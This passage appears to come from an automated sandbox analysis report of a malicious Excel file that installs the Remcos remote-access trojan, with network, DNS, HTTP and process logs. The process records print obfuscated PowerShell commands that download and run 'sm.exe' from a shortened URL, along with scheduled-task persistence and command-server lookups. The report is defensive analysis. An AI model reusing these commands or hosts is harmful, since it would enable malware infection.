                                                                      Jan 6, 2021 07:46:27.961069107 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.961081028 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.961108923 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.961126089 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.961146116 CET4916980192.168.2.2283.172.144.37
                                                                      Jan 6, 2021 07:46:27.961153030 CET804916983.172.144.37192.168.2.22
                                                                      Jan 6, 2021 07:46:27.961169004 CET804916983.172.144.37192.168.2.22

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 6, 2021 07:46:25.926832914 CET5219753192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:46:25.983120918 CET53521978.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:46:26.560906887 CET5309953192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:46:26.618717909 CET53530998.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:46:26.621823072 CET5283853192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:46:26.669622898 CET53528388.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:46:27.672903061 CET6120053192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:46:27.752340078 CET53612008.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:21.152748108 CET4954853192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:21.208853006 CET53495488.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:23.514297009 CET5562753192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:23.562139034 CET53556278.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:23.562608957 CET5562753192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:23.618985891 CET53556278.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:25.898034096 CET5600953192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:25.945950985 CET53560098.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:25.946357012 CET5600953192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:26.002310038 CET53560098.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:28.285978079 CET6186553192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:28.342349052 CET53618658.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:31.237560987 CET5517153192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:31.296565056 CET53551718.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:31.298106909 CET5517153192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:31.357040882 CET53551718.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:33.656312943 CET5249653192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:33.704406023 CET53524968.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:33.704891920 CET5249653192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:33.761020899 CET53524968.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:36.047714949 CET5756453192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:36.095710039 CET53575648.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:36.096323967 CET5756453192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:36.144037008 CET53575648.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:38.440308094 CET6300953192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:38.496793985 CET53630098.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:38.497515917 CET6300953192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:38.555737972 CET53630098.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:40.838313103 CET5931953192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:40.897711992 CET53593198.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:40.898076057 CET5931953192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:40.948894024 CET53593198.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:43.204868078 CET5307053192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:43.252649069 CET53530708.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:45.533502102 CET5977053192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:45.589710951 CET53597708.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:45.590146065 CET5977053192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:45.638139963 CET53597708.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:47.889868021 CET6152353192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:47.946109056 CET53615238.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:50.224656105 CET6279153192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:50.280874968 CET53627918.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:52.595844030 CET5066753192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:52.646631002 CET53506678.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:54.948757887 CET5412953192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:54.996865034 CET53541298.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:54.997236013 CET5412953192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:55.045100927 CET53541298.8.8.8192.168.2.22
                                                                      Jan 6, 2021 07:47:57.321141005 CET6532953192.168.2.228.8.8.8
                                                                      Jan 6, 2021 07:47:57.377233982 CET53653298.8.8.8192.168.2.22

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Jan 6, 2021 07:46:25.926832914 CET192.168.2.228.8.8.80x70c0Standard query (0)cutt.lyA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:46:27.672903061 CET192.168.2.228.8.8.80xb15bStandard query (0)bighoreca.nlA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:21.152748108 CET192.168.2.228.8.8.80x78a4Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:23.514297009 CET192.168.2.228.8.8.80x3bb6Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:23.562608957 CET192.168.2.228.8.8.80x3bb6Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:25.898034096 CET192.168.2.228.8.8.80xe827Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:25.946357012 CET192.168.2.228.8.8.80xe827Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:28.285978079 CET192.168.2.228.8.8.80x61d6Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:31.237560987 CET192.168.2.228.8.8.80xdfeaStandard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:31.298106909 CET192.168.2.228.8.8.80xdfeaStandard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:33.656312943 CET192.168.2.228.8.8.80x408bStandard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:33.704891920 CET192.168.2.228.8.8.80x408bStandard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:36.047714949 CET192.168.2.228.8.8.80xf3baStandard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:36.096323967 CET192.168.2.228.8.8.80xf3baStandard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:38.440308094 CET192.168.2.228.8.8.80x5011Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:38.497515917 CET192.168.2.228.8.8.80x5011Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:40.838313103 CET192.168.2.228.8.8.80xb0adStandard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:40.898076057 CET192.168.2.228.8.8.80xb0adStandard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:43.204868078 CET192.168.2.228.8.8.80x444fStandard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:45.533502102 CET192.168.2.228.8.8.80xa191Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:45.590146065 CET192.168.2.228.8.8.80xa191Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:47.889868021 CET192.168.2.228.8.8.80x8223Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:50.224656105 CET192.168.2.228.8.8.80x1865Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:52.595844030 CET192.168.2.228.8.8.80x3426Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:54.948757887 CET192.168.2.228.8.8.80x81abStandard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:54.997236013 CET192.168.2.228.8.8.80x81abStandard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:57.321141005 CET192.168.2.228.8.8.80x3806Standard query (0)blessings2021.ddns.netA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Jan 6, 2021 07:46:25.983120918 CET8.8.8.8192.168.2.220x70c0No error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:46:25.983120918 CET8.8.8.8192.168.2.220x70c0No error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:46:25.983120918 CET8.8.8.8192.168.2.220x70c0No error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:46:27.752340078 CET8.8.8.8192.168.2.220xb15bNo error (0)bighoreca.nl83.172.144.37A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:21.208853006 CET8.8.8.8192.168.2.220x78a4No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:23.562139034 CET8.8.8.8192.168.2.220x3bb6No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:23.618985891 CET8.8.8.8192.168.2.220x3bb6No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:25.945950985 CET8.8.8.8192.168.2.220xe827No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:26.002310038 CET8.8.8.8192.168.2.220xe827No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:28.342349052 CET8.8.8.8192.168.2.220x61d6No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:31.296565056 CET8.8.8.8192.168.2.220xdfeaNo error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:31.357040882 CET8.8.8.8192.168.2.220xdfeaNo error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:33.704406023 CET8.8.8.8192.168.2.220x408bNo error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:33.761020899 CET8.8.8.8192.168.2.220x408bNo error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:36.095710039 CET8.8.8.8192.168.2.220xf3baNo error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:36.144037008 CET8.8.8.8192.168.2.220xf3baNo error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:38.496793985 CET8.8.8.8192.168.2.220x5011No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:38.555737972 CET8.8.8.8192.168.2.220x5011No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:40.897711992 CET8.8.8.8192.168.2.220xb0adNo error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:40.948894024 CET8.8.8.8192.168.2.220xb0adNo error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:43.252649069 CET8.8.8.8192.168.2.220x444fNo error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:45.589710951 CET8.8.8.8192.168.2.220xa191No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:45.638139963 CET8.8.8.8192.168.2.220xa191No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:47.946109056 CET8.8.8.8192.168.2.220x8223No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:50.280874968 CET8.8.8.8192.168.2.220x1865No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:52.646631002 CET8.8.8.8192.168.2.220x3426No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:54.996865034 CET8.8.8.8192.168.2.220x81abNo error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:55.045100927 CET8.8.8.8192.168.2.220x81abNo error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)
                                                                      Jan 6, 2021 07:47:57.377233982 CET8.8.8.8192.168.2.220x3806No error (0)blessings2021.ddns.net185.244.30.19A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • bighoreca.nl

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.224916983.172.144.3780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 6, 2021 07:46:27.805526972 CET72OUTGET /wp-content/themes/index/Shipppy.exe HTTP/1.1
                                                                      Host: bighoreca.nl
                                                                      Connection: Keep-Alive
                                                                      Jan 6, 2021 07:46:27.857237101 CET72INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Wed, 06 Jan 2021 06:46:27 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 691200
                                                                      Last-Modified: Wed, 06 Jan 2021 00:01:43 GMT
                                                                      Connection: keep-alive
                                                                      ETag: "5ff4fde7-a8c00"
                                                                      X-Powered-By: PleskLin
                                                                      Accept-Ranges: bytes


                                                                      HTTPS Packets

                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                      Jan 6, 2021 07:46:26.097018003 CET104.22.1.232443192.168.2.2249167CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                      CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027

                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      Analysis Process: EXCEL.EXE PID: 2476 Parent PID: 584

                                                                      General

                                                                      Start time:07:45:47
                                                                      Start date:06/01/2021
                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                      Imagebase:0x13f800000
                                                                      File size:27641504 bytes
                                                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: cmd.exe PID: 2340 Parent PID: 2476

                                                                      General

                                                                      Start time:07:45:50
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                                                                      Imagebase:0x4acd0000
                                                                      File size:345088 bytes
                                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      Analysis Process: cmd.exe PID: 912 Parent PID: 2476

                                                                      General

                                                                      Start time:07:45:50
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                                                                      Imagebase:0x4acd0000
                                                                      File size:345088 bytes
                                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      Analysis Process: cmd.exe PID: 2940 Parent PID: 2476

                                                                      General

                                                                      Start time:07:45:50
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                                                                      Imagebase:0x4acd0000
                                                                      File size:345088 bytes
                                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      Analysis Process: powershell.exe PID: 2908 Parent PID: 2340

                                                                      General

                                                                      Start time:07:45:51
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                                                                      Imagebase:0x13f340000
                                                                      File size:473600 bytes
                                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:high

                                                                      Analysis Process: powershell.exe PID: 2904 Parent PID: 912

                                                                      General

                                                                      Start time:07:45:51
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                                                                      Imagebase:0x13f340000
                                                                      File size:473600 bytes
                                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:high

                                                                      Analysis Process: powershell.exe PID: 2896 Parent PID: 2940

                                                                      General

                                                                      Start time:07:45:51
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                                                                      Imagebase:0x13f340000
                                                                      File size:473600 bytes
                                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:high

                                                                      Analysis Process: sm.exe PID: 1688 Parent PID: 2896

                                                                      General

                                                                      Start time:07:46:18
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Imagebase:0xd0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2199538688.0000000003299000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000C.00000002.2198158446.00000000022F3000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Analysis Process: schtasks.exe PID: 2320 Parent PID: 1688

                                                                      General

                                                                      Start time:07:46:29
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp'
                                                                      Imagebase:0xe30000
                                                                      File size:179712 bytes
                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: sm.exe PID: 260 Parent PID: 1688

                                                                      General

                                                                      Start time:07:46:30
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Imagebase:0xd0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low

                                                                      Analysis Process: sm.exe PID: 2900 Parent PID: 1688

                                                                      General

                                                                      Start time:07:46:30
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Imagebase:0xd0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low

                                                                      Analysis Process: sm.exe PID: 752 Parent PID: 1688

                                                                      General

                                                                      Start time:07:46:30
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Imagebase:0xd0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low

                                                                      Analysis Process: sm.exe PID: 2112 Parent PID: 1688

                                                                      General

                                                                      Start time:07:46:31
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Imagebase:0xd0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Remcos_1, Description: Remcos Payload, Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                                                      Reputation:low

                                                                      Analysis Process: wscript.exe PID: 2512 Parent PID: 2112

                                                                      General

                                                                      Start time:07:46:33
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                                                                      Imagebase:0x570000
                                                                      File size:141824 bytes
                                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: cmd.exe PID: 2344 Parent PID: 2512

                                                                      General

                                                                      Start time:07:46:35
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                                                                      Imagebase:0x4a7f0000
                                                                      File size:302592 bytes
                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: remcos.exe PID: 3032 Parent PID: 2344

                                                                      General

                                                                      Start time:07:46:36
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.2234495030.00000000031A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000016.00000002.2233337169.00000000021FF000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 13%, ReversingLabs
                                                                      Reputation:low

                                                                      Analysis Process: remcos.exe PID: 852 Parent PID: 1388

                                                                      General

                                                                      Start time:07:46:41
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
